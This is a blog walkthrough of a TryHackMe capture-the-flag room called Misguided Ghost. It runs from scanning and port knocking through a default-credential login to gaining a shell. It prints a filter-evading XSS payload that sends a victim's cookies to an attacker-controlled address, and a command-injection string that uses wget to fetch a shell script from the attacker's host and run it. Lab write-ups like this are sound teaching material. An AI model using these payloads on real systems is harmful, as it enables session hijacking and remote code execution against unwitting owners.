TryHackMe Challenges: Misguided Ghost Walkthrough

21 Jan, 2021

TryHackMe Challenges: Misguided Ghost Walkthrough

TryHackMe Challenges, TryHackMe

Reading Time: 6 minutes

In this post, i would like to share a walkthrough on Misguided Ghost Room.

This room is been considered difficulty rated as a HARD machine

Let’s Start!

We need to deploy the machine for us to play with the machine

Information Gathering on Misguided Ghost

Once the machine is fully up within 5 minutes, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

There are multiple ports that been open but the crucial port that caught my attention

21: csftpd 3.0.2
22: OpenSSH 7.6p1

Let’s try FTP to the machine via an anonymous user. Once you have a successful login, you can see /pub/ there. Let’s see what is stored in /pub/ directory

We have info.txt, jokes.txt, and trace.pcapng and let’s download those files into our machine

So, let’s see what’s written in info.txt

Let’s see what’s written in jokes.txt

Let’s see what’s written in trace.pcapng by running Wireshark

As a result, let’s filter the packet to ip.scr== 192.168.236.128 and ip.dst==192.168.236.131

Before knocking the port on the machine, let’s install the tools by executing sudo apt-get install knockd

Based on my review of Wireshark packets, let’s knock the machine with the port mentioned in the packets.

It will not work immediately where you need to knock the port multiple times.

Let’s run again the same nmap command to see if any additional ports have been opened. We got a new port open port 8080

Let’s dive into the website interface

Let’s run the dirb https://<IP Adress>:8080

We will get the /login/ directory on my dirb output. It will direct us to the login page.

From my observation on the website, I notice that the certificate issuer of the website is zac@misguided_ghosts.thm

Let’s try username zac and password zac

Oh wow! I have successfully login as Zac

Managed to login as Zac

Let's try the execute the programming command such a

&#x3C;scrscriptipt&#x3E; document.location='http://10.6.31.213:9001/XSS/grabber.php?c='+document.cookie  &#x3C;/scrscriptipt&#x3E;

We will see the new grabber than login=zac_from_paramore (older cookie)

We will have to copy-paste the older cookie with the newer-cookie. Once we have replaced the cookie value, we need to refresh the page and surprisingly we log-in as Hayley.

I also found /photos directory on the dirb output.

Trying to upload a file on the web application

Let’s start the NC listener up and execute the command below to get the connection back to us

The command that we need to execute is

/photos?image=/etc/passwd;CMD=$'\x20wget\x20<IP Address>:8000/<filename>.sh';`$CMD`

/photos?image=/etc/passwd;CMD=$'\x20sh\x20shell.sh';`$CMD`

It will take multiple attempts for us to get the connection back

The reverse shell on the Misguided Ghost machine

We need can go to /home/zac directory and there is no user.txt as usual. As a result, we need to enumerate more on the machine to find the user flag.

When we look into .secret, we have an idea that zac doesn’t remember the password at all. Paramore said that he left zac with the encrypted private key.